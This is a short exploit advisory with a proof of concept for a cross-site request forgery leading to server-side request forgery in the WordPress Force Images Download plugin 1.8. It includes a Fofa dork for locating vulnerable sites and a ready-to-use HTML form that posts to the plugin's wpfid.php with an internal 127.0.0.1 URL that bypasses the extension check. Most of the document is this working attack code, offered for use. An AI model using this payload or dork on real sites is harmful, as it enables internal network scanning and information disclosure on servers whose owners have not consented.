WordPress Force Images Download plugin version 1.8 suffers from a cross site request forgery vulnerability that can enable server-side request forgery attacks.
67e9a5b855786404166475b9a48f2a6e7f4ffd1808b6238b93a3ddf567bcae03
# Exploit Author : Etharus
# Vulnerability : Cross Site Request Forgery to Server Side Request Forgery
# Impact : internal ip disclosure , file extension bypass, internal port scan.
# Product Vendor : Nazakat Ali
# Version Tested : 1.8
# Date : 14/07/2023
# Fofa Dork : "/wp-content/plugins/wp-force-images-download/"
<form id="wpfid-form" method="post" action="https://target/wp-content/plugins/wp-force-images-download/wpfid.php">
<input name="wpfid_pic_url" type="text" placeholder="[TARGET URL] : http://127.0.0.1/?r=bypass.jpg">
<br><input name="new_name" type="hidden" value="">
<button style="background: gray; --darkreader-inline-bgcolor: #60686c; --darkreader-inline-bgimage: none;" class="d-btn" id="wpfid_button" type="submit" title="Download" data-darkreader-inline-bgcolor="" data-darkreader-inline-bgimage="">
<span style="line-height: 30px;" class="wpfid_title">Download</span>
</button>
</form>